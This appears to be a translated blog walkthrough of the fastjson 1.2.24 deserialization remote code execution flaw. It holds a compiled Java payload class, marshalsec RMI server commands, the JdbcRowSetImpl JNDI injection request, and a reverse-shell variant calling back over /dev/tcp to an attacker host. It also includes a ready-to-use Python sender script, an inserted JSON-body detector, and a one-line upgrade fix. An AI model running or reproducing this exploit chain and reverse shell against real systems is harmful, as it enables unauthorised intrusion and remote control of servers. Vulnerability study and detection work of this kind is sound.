fastjson 1.2.24 deserialization leading to arbitrary command execution

    Introduction

    Fastjson is a Java library that converts Java objects to JSON and, of course, can also convert JSON strings back into Java objects.

    Fastjson can operate on any Java object, even pre-existing objects for which no source code is available.

    PoC

    //FileName:Exploit.java
    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    
    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/exphub"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }
    
            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }
    
        public static void main(String[] args) throws Exception {
        }
    }
    

    Compile it into a class file and upload it to the VPS.

    javac Exploit.java
    

    Start an HTTP server with python3 and move the PoC class into that directory.

    python3 -m http.server 8888
    


    Start the remote class-loading service; the remote class file can be served through either a JRMP service or an LDAP service.

    JRMP service

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps:8888/#Exploit" 9999
    


    Construct the request that makes the target load the remote class

    POST / HTTP/1.1
    Host: your-ip:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 160
    
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://vps:9999/TouchFile",
            "autoCommit":true
        }
    }
    
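    As an added example (not part of the original post), here is a small Python checker a defender can run over JSON request bodies to flag the pattern in the request above: an "@type" key naming com.sun.rowset.JdbcRowSetImpl together with a "dataSourceName" that points at a remote JNDI URL. The sample bodies and host names are constructed for the example.

```python
import json
import re

# Gadget class used by the request on this page; extend the set with other
# JNDI-reachable classes as needed (only JdbcRowSetImpl is taken from the post).
DANGEROUS_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_URL = re.compile(r"^(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)  # remote JNDI lookups

def walk(node):
    """Yield every dict in a parsed JSON tree, depth first, so nested gadgets are seen."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from walk(value)

def inspect_body(body):
    """Return a list of (reason, detail) findings for one JSON request body."""
    findings = []
    try:
        tree = json.loads(body)
    except ValueError:
        # fastjson is laxer than json.loads, so a parse failure is not proof of safety.
        if "@type" in body:
            findings.append(("unparsed-body-with-@type", body[:80]))
        return findings
    for obj in walk(tree):
        type_name = obj.get("@type")
        if isinstance(type_name, str):
            reason = "dangerous-@type" if type_name in DANGEROUS_TYPES else "autotype-used"
            findings.append((reason, type_name))
        dsn = obj.get("dataSourceName")
        if isinstance(dsn, str) and JNDI_URL.match(dsn):
            findings.append(("jndi-datasource", dsn))
    return findings

# Constructed samples: this post's request, a benign body, and the gadget nested in an array.
SAMPLES = {
    "page_payload": '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
                    '"dataSourceName":"rmi://vps:9999/TouchFile","autoCommit":true}}',
    "benign": '{"user":"alice","items":[{"id":1},{"id":2}]}',
    "nested": '{"list":[{"x":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"ldap://attacker.example:1389/a"}}]}',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

    Any "@type" key at all is worth logging on a fastjson 1.2.24 deployment, since autoType is what lets the attacker choose the class; the "dangerous-@type" and "jndi-datasource" findings are the ones to alert on.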


    The file is created: command execution succeeded.


    Reverse shell

    import java.io.BufferedReader;
    import java.io.InputStream;
    import java.io.InputStreamReader;
    
    public class Exploit{
        public Exploit() throws Exception {
            Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >&  /dev/tcp/vps/55555 0>&1"});
            InputStream is = p.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(is));
    
            String line;
            while((line = reader.readLine()) != null) {
                System.out.println(line);
            }
    
            p.waitFor();
            is.close();
            reader.close();
            p.destroy();
        }
    
        public static void main(String[] args) throws Exception {
        }
    }
    
    


    Tools and attachments

    Detection script:

    #FileName:fastjson-1.2.24_rce.py
    
    import sys
    import requests
    
    if len(sys.argv)!=3:
        print('+------------------------------------------------------------------------------------+')
        print('+      RMIServer: rmi://ip:port/exp                                                  +')
        print('+      LDAPServer: ldap://ip:port/exp                                                +')
        print('+------------------------------------------------------------------------------------+')
        print('+ USE: python3 <filename> <target-ip> <RMI/LDAPServer>                               +')
        print('+ EXP: python3 fastjson-1.2.24_rce.py http://1.1.1.1:8080/ ldap://2.2.2.2:88/Object  +')
        print('+ VER: fastjson<=1.2.24                                                              +')
        print('+------------------------------------------------------------------------------------+')
        sys.exit()
    
    url = sys.argv[1]
    server = sys.argv[2]
    
    headers = {
        'Host': "127.0.0.1",
        'Content-Type': "application/json",
        'Accept-Encoding': "gzip, deflate",
        'Connection': "close",
        'Accept': "*/*",
        'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
        }
     
    
    payload = '''
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"%s",
            "autoCommit":true
        }
    }  
    ''' %server
    
    
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=10)
        print("[+] RMI/LDAP Send Success ")
    except requests.RequestException:
        print("[-] RMI/LDAP Send Failed ")
    
    
    python fastjson-1.2.24_rce.py
    


    Remediation advice

    Upgrade fastjson to the latest version.


Original post: https://www.cnblogs.com/dyanbk/p/14281460.html